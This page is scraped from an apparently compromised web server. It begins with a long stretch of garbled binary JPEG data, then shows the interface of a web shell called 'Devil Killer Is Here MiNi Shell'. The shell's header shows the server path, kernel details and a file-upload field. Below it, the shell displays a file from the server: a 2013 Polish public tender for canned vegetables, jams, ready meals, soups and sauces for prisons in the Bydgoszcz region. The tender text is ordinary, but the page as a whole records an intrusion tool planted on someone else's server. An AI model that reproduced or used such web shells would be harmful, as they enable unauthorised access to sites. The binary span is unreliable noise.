JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130904/177301-N-2013.html

<p class="kh_header"><b>Gdańsk: Dostawy warzyw i owoców przetworzonych, dań gotowych oraz zup i sosów
znak sprawy: 14/2013/BIGB O/POTULICE</b><br>
<b>Numer ogłoszenia: 177301 - 2013; data zamieszczenia: 04.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Bałtycka Instytucja Gospodarki Budżetowej BALTICA , ul. Kurkowa 12, 80-803 Gdańsk, woj. pomorskie, tel. 58 3231102, faks 58 3231101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.igbbaltica.pl/</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: igb.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy warzyw i owoców przetworzonych, dań gotowych oraz zup i sosów
znak sprawy: 14/2013/BIGB O/POTULICE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Grupa 1:
1) Ogórki konserwowe, w opakowaniu szklanym (słoik) od 800 g do 900 g, ilość szacunkowa 1500 opakowań. CPV: 15331500-2.
2) Ogórki kwaszone, w opakowaniu szklanym (słoik) od 800 g do 900 g, ilość szacunkowa 600 opakowań. CPV: 15331000-7.
3) Kapusta kwaszona, w opakowaniu 5 kg, ilość szacunkowa 500 opakowań. CPV: 15331142-4.
4) Papryka konserwowa, w opakowaniu szklanym (słoik) od 600 g do 700 g, ilość szacunkowa 840 opakowań. CPV: 15331136-9.
5) Marchew konserwowa, w opakowaniu szklanym (słoik) od 500 g do 600 g, ilość szacunkowa 1500 opakowań. CPV: 15331110-1.
6) Mieszanka warzywna z groszku zielonego i marchwi, w opakowaniu szklanym (słoik) od 400 g do 500 g, ilość szacunkowa 1500 opakowań. CPV: 15331110-1.
7) Groszek konserwowy, w opakowaniu (puszka samootwieralna) od 350 g do 450 g, ilość szacunkowa 1620 opakowań. CPV: 15331462-3.
8) Fasola czerwona, w opakowaniu (puszka samootwieralna) od 350 g do 450 g, ilość szacunkowa 800 opakowań. CPV: 15331131-4.
9) Kukurydza konserwowa, w opakowaniu (puszka samootwieralna) od 300 g do 400 g, ilość szacunkowa 2060 opakowań. CPV: 15331470-2.
10) Brzoskwinie, w opakowaniu (puszka samootwieralna) od 800 g do 900 g, ilość szacunkowa 1200 opakowań. CPV: 15332100-5.
11) Ananas (plastry), w opakowaniu (puszka samootwieralna) od 500 g do 600 g, ilość szacunkowa 1200 opakowań. CPV: 15332100-5.
12) Pieczarki marynowane, w opakowaniu szklanym (słoik) od 250 g do 300 g, ilość szacunkowa 600 opakowań. CPV: 15331135-2.
13) Sałatka obiadowa  w opakowaniu szklanym (słoik) od 800g do 900g składniki:warzywa (kapusta biała ,marchew,cebula,papryka) woda ,ocet-regulator kwasowości,cukier,sól, naturalne przyprawy aromatyczno-smakowe w tym gorczyca ilość szacunkowa 800 opakowań. CPV: 15331000-7
14) Sałatka warzywna  w opakowaniu szklanym (słoik) od 800g do 900g -składniki: warzywa  (ogórek ,marchew,cebula,papryka) woda ,ocet-regulator kwasowości,cukier,sól,  naturalne przyprawy aromatyczno-smakowe w tym gorczyca ilość szacunkowa 800 opakowań.  CPV: 15331000-7
15) Sałatka szwedzka  w opakowaniu szklanym (słoik) od 800g do 900g -składniki:warzywa  (ogórek,cebula) woda ,ocet-regulator kwasowości,cukier,sól,  naturalne przyprawy aromatyczno-smakowe w tym gorczyca ilość szacunkowa 800 opakowań CPV: 15331000-7
16) Dżem wiśniowy niskosłodzony Łowicz, w opakowaniu szklanym (słoik) 300 g, ilość szacunkowa 1000 opakowań. CPV: 15332294-1.
17) Dżem truskawkowy niskosłodzony Łowicz, w opakowaniu szklanym (słoik) 300 g, ilość szacunkowa 1000 opakowań. CPV: 15332296-5.
18) Dżem jagodowy niskosłodzony Łowicz, w opakowaniu szklanym (słoik) 300 g, ilość szacunkowa 1000 opakowań. CPV: 15332290-3.
19) Dżem truskawkowy, w opakowaniu szklanym (słoik) od 250 g do 300 g, ilość szacunkowa 2500 opakowań. CPV: 15332296-5.
20) Dżem z czarnej porzeczki, w opakowaniu szklanym (słoik) od 250 g do 300 g, ilość szacunkowa 2500 opakowań. CPV: 15332293-4.
21) Dżem brzoskwiniowy, w opakowaniu szklanym (słoik) od 250 g do 300 g, ilość szacunkowa 2500 opakowań. CPV: 15332290-3.
22) Rodzynki, w opakowaniu od 90 g do 110 g, ilość szacunkowa 2800 opakowań. CPV: 15332412-5.
23) Pestki dyni, w opakowaniu od 90 g do 110 g, ilość szacunkowa 1000 opakowań. CPV: 03211900-2.
24) Słonecznik prażony, w opakowaniu od 45 g do 55 g., ilość szacunkowa 1500 opakowań. CPV: 03211900-2.
25) Słonecznik łuskany, w opakowaniu od 90 g do 110 g, ilość szacunkowa 2400 opakowań. CPV: 03211900-2.
26) Fistaszki (orzeszki ziemne niełuskane), w opakowaniu od 900 g do 1000 g, ilość szacunkowa 1600 opakowań. CPV: 15332300-7.
27) Orzeszki solone, w opakowaniu od 90 g do 110 g (nie w puszce), ilość szacunkowa 1200 opakowań. CPV: 15332310-0.

28) Śliwka suszona kalifornijska w opakowaniu od 90 g do 110 g, ilość szacunkowa 1000   opakowań. CPV: 15332410-1.
29) Morela suszona w opakowaniu od 90 g do 110 g, ilość szacunkowa 1000 opakowań. CPV: 15332410-1.
30) Daktyle suszone drylowane w opakowaniu od 90 g do 110 g, ilość szacunkowa 1000 opakowań. CPV: 15332410-1.
31) Orzechy włoskie łuskane w opakowaniu 200 g, ilość szacunkowa 1500 szt. CPV: 15332300-7.
32) Orzeszki laskowe łuskane w opakowaniu 200 g, ilość szacunkowa 1500 szt. CPV: 15332300-7.
2. Grupa 2:
1) Pulpety z mięsa wieprzowego w sosie pomidorowym, w opakowaniu szklanym (słoik) od 450 g do 550 g, ilość szacunkowa 3000 opakowań. CPV: 15894300-4.
2) Gołąbki w sosie pomidorowym w opakowaniu szklanym (słoik) od 450 g do 550 g,  ilość szacunkowa 2000 opakowań, skład m. in.: mięso wieprzowo-wołowe, ryż, kapusta. CPV: 15894300-4.
3) Kotlety sojowe a la schabowe, w opakowaniu od 90 g do 110 g, ilość szacunkowa 2500 opakowań. CPV: 15894300-4.
4) Flaki w sosie pomidorowym w opakowaniu szklanym od 450 g do 550 g, ilość szacunkowa 1500 opakowań. CPV:15894300-4.
5) Fasolka po bretońsku z kiełbasą w sosie pomidorowym w opakowaniu szklanym (słoik) od 450 g do 550 g, ilość szacunkowa 2500 opakowań. CPV:15894300-4.
6) Zupa - barszcz czerwony Winiary instant, doskonały smak i aromat, w opakowaniu szklanym (słoik) 150 g, ilość szacunkowa 600 opakowań. CPV: 15891400-4.
7) Zupa - rosół z kury Winiary instant, doskonały smak i aromat, w opakowaniu szklanym (słoik) 150 g, ilość szacunkowa 600 opakowań. CPV: 15891500-4.
8) Zupa błyskawiczna z makaronem ostra o smaku kurczaka Vifon kurczak curry, w opakowaniu 70 g, ilość szacunkowa 25200 opakowań. CPV: 15891400-4.
9) Zupa instant Amino - różne smaki, w opakowaniu od 60 g do 70 g, ilość szacunkowa 10000 opakowań. CPV: 15891400-4.
10) Zupa Knorr gorący kubek - różne smaki, w opakowaniu od 15 g do 21 g, ilość szacunkowa 2500 opakowań. CPV: 15891400-4.
11) Gorący kubek Knorr danie instant - różne smaki, dania gotowe w kubeczku plastikowym do zalania gorącą wodą, ilość szacunkowa 1000 opakowań. CPV: 15894300-4.
12) Rosół z kury w kostce Knorr, w opakowaniu po 6 kostek po 10 g, ilość szacunkowa 1000 opakowań. CPV: 15891400-4.
13) Sos boloński Łowicz, w opakowaniu szklanym (słoik) 300 g, ilość szacunkowa 1500 opakowań. CPV: 15871260-4.
14) Sos słodko-kwaśny Łowicz, w opakowaniu szklanym (słoik) 300 g, ilość szacunkowa  1500 opakowań. CPV: 15871260-4.
15) Sos meksykański Łowicz, w opakowaniu szklanym (słoik)  300 g, ilość szacunkowa 1500 opakowań. CPV: 15871260-4.
16) Sos bolognese z ziołami Dawtona, w opakowaniu szklanym (słoik) 425 g, ilość szacunkowa 2000 opakowań. CPV: 15871260-4.
17) Sos węgierski z pieczarkami Dawtona, w opakowaniu szklanym (słoik) 425 g, ilość szacunkowa 2400 opakowań. CPV: 15871260-4.
18) Sos meksykański Dawtona, w opakowaniu szklanym (słoik) 425 g, ilość szacunkowa 2400 opakowań. CPV: 15871260-4.
19) Sos czosnkowy Winiary, w opakowaniu szklanym (słoik) 250 ml, ilość szacunkowa 1000 opakowań. CPV: 15871260-4.
20) Sos tatarski Winiary, w opakowaniu szklanym (słoik) 250 ml, ilość szacunkowa 1000 opakowań. CPV: 15871260-4.
21) Sos pomidorowy Cykoria, w opakowaniu 50 g, ilość szacunkowa 3000 opakowań. CPV: 15871260-4.
22) Sos boloński Amino kuchnia polska, w opakowaniu 43 g, ilość szacunkowa 1000 opakowań. CPV: 15871260-4.
23) Sos pieczarkowy w opakowaniu 30 g, ilość szacunkowa 1000 opakowań. CPV: 15871260-4.
24) Sos pieczeniowy jasny w opakowaniu 30 g, ilość szacunkowa 1000 opakowań. CPV: 15871260-4.
25) Sos pieczeniowy ciemny w opakowaniu 30 g, ilość szacunkowa 1000 opakowań. CPV: 15871260-4.
26) Sos sałatkowy 9 g, ilość szacunkowa 800 szt. CPV: 15871260-4.

3. Ilości szacunkowe dostarczanych artykułów mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość zamawianych artykułów będzie wynikała z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy.
4. Oferowane artykuły nie mogą wykazywać oznak nieświeżości lub zepsucia. Mają być świeże, o dobrym smaku w zamkniętych i nieuszkodzonych opakowaniach. Opakowania muszą posiadać nadrukowany kod kreskowy oraz nadrukowaną informację o nazwie środka spożywczego (skład), nazwie i adresie producenta, dacie przydatności do spożycia oraz gramaturze (g, kg) lub pojemności (ml, l).
5. Termin ważności dostarczanych artykułów - minimum 6 miesięcy, liczony od dnia dostawy. Dostawa artykułów z krótszym terminem ważności może zostać realizowana po uprzednim uzyskaniu zgody od Zamawiającego.
6. Dopuszczalne są oferty równoważne, tzn. artykuły o innych nazwach handlowych niż określone przez zamawiającego, pod warunkiem, że będą posiadały parametry np. gramaturę lub pojemność, albo ilość sztuk w opakowaniu taką samą jak opisany przez zamawiającego dany przedmiot zamówienia oraz będą posiadały inne parametry, w szczególności dotyczące smaku i aromatu nie gorsze niż artykuły opisane i wymienione przez zamawiającego. Na wykonawcy ciąży udowodnienie, że równoważny artykuł nie jest gorszy od określonego przez zamawiającego. W przypadku oferowania artykułów równoważnych wykonawca do oferty załącza wypełniony załącznik nr 5 do siwz, tj. formularz dotyczący porównania parametrów artykułów.
7. Miejsce, sposób, terminy dostaw oraz forma i termin płatności.
1) Wykonawca dostarczać będzie ww. artykuły na swój koszt, zgodnie z wymogami sanitarnymi w sposób zapobiegający utracie walorów użytkowych, smakowych i odżywczych do magazynów Zamawiającego zlokalizowanych na terenie:
a) Zakładu Karnego w Potulicach, ul. Aleja Parkowa 1
b) Aresztu Śledczego w Bydgoszczy, ul. Wały Jagiellońskie 4
c) Zakładu Karnego w Bydgoszczy-Fordonie, ul. Rynek 8
d) Zakładu Karnego w Koronowie, ul. Bydgoska 27
e) Aresztu Śledczego w Chojnicach, ul. Pietruszkowa 4
f) Zakładu Karnego Nr 1 w Grudziądzu, ul. Wybickiego 10-22
g) Zakładu Karnego Nr 2 w Grudziądzu, ul. Sikorskiego 13-17
h) Aresztu Śledczego w Inowrocławiu, ul. Gabriela Narutowicza 46
i) Aresztu Śledczego w Toruniu, ul. Piekary 53
j) Zakładu Karnego we Włocławku, ul. Bartnicka 10
k) Oddziału Zewnętrznego w Bydgoszczy, ul. Toruńska 276.
2) Realizacja dostaw do magazynu w uzgodnionych terminach, w godz. 8:00-12:00.
3) Termin płatności: 30 dni, forma płatności: przelew..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.33.15.00-0, 15.89.43.00-0, 15.33.15.00-2, 15.33.11.36-9, 15.33.14.62-3, 15.33.10.00-7, 15.33.21.00-5, 15.89.43.00-4, 15.87.12.60-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zmiany postanowień niniejszej umowy mogą dotyczyć w szczególności:
1) nazwy, adresu oraz osób reprezentujących strony, a także osób wymienionych w § 6 pkt 1 i ,lub pkt 2
2) cen artykułów wymienionych w załączniku nr 1 do umowy, o kwotę nie większą niż wynikającą ze wskaźnika cen towarów i usług konsumpcyjnych, podanego przez GUS publikowanego na stronie internetowej: www.stat.gov.pl. Wskaźnik cen towarów i usług konsumpcyjnych liczony jest miesięcznie od terminu obowiązywania umowy, o którym mowa w § 2 pkt 1
3) urzędowej stawki podatku VAT na artykuły wymienione w załączniku nr 1 do umowy
4) każdej zmiany, która jest korzystna lub neutralna dla zamawiającego
5) zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego
6) terminu zakończenia (przedłużenia) obowiązywania niniejszej umowy, o którym mowa w § 2 pkt 1, z zastrzeżeniem § 3 pkt 3
7) dopisania do § 5 pkt 1 ppkt 1 magazynu zlokalizowanego  na terenie Aresztu Śledczego w Chełmnie, ul. 22 stycznia 3a.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.igbbaltica.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> BIGB  BALTICA O/POTULICE
UL.ALEJA PARKOWA 1
89-120 POTULICE.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.09.2013 godzina 12:00, miejsce: BIGB  BALTICA O/POTULICE
UL.ALEJA PARKOWA 1
89-120 POTULICE
sekretariat ZK POTULICE.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NIE DOTYCZY.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> GRUPA 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Grupa 1:
1) Ogórki konserwowe, w opakowaniu szklanym (słoik) od 800 g do 900 g, ilość szacunkowa 1500 opakowań. CPV: 15331500-2.
2) Ogórki kwaszone, w opakowaniu szklanym (słoik) od 800 g do 900 g, ilość szacunkowa 600 opakowań. CPV: 15331000-7.
3) Kapusta kwaszona, w opakowaniu 5 kg, ilość szacunkowa 500 opakowań. CPV: 15331142-4.
4) Papryka konserwowa, w opakowaniu szklanym (słoik) od 600 g do 700 g, ilość szacunkowa 840 opakowań. CPV: 15331136-9.
5) Marchew konserwowa, w opakowaniu szklanym (słoik) od 500 g do 600 g, ilość szacunkowa 1500 opakowań. CPV: 15331110-1.
6) Mieszanka warzywna z groszku zielonego i marchwi, w opakowaniu szklanym (słoik) od 400 g do 500 g, ilość szacunkowa 1500 opakowań. CPV: 15331110-1.
7) Groszek konserwowy, w opakowaniu (puszka samootwieralna) od 350 g do 450 g, ilość szacunkowa 1620 opakowań. CPV: 15331462-3.
8) Fasola czerwona, w opakowaniu (puszka samootwieralna) od 350 g do 450 g, ilość szacunkowa 800 opakowań. CPV: 15331131-4.
9) Kukurydza konserwowa, w opakowaniu (puszka samootwieralna) od 300 g do 400 g, ilość szacunkowa 2060 opakowań. CPV: 15331470-2.
10) Brzoskwinie, w opakowaniu (puszka samootwieralna) od 800 g do 900 g, ilość szacunkowa 1200 opakowań. CPV: 15332100-5.
11) Ananas (plastry), w opakowaniu (puszka samootwieralna) od 500 g do 600 g, ilość szacunkowa 1200 opakowań. CPV: 15332100-5.
12) Pieczarki marynowane, w opakowaniu szklanym (słoik) od 250 g do 300 g, ilość szacunkowa 600 opakowań. CPV: 15331135-2.
13) Sałatka obiadowa  w opakowaniu szklanym (słoik) od 800g do 900g składniki:warzywa (kapusta biała ,marchew,cebula,papryka) woda ,ocet-regulator kwasowości,cukier,sól, naturalne przyprawy aromatyczno-smakowe w tym gorczyca ilość szacunkowa 800 opakowań. CPV: 15331000-7
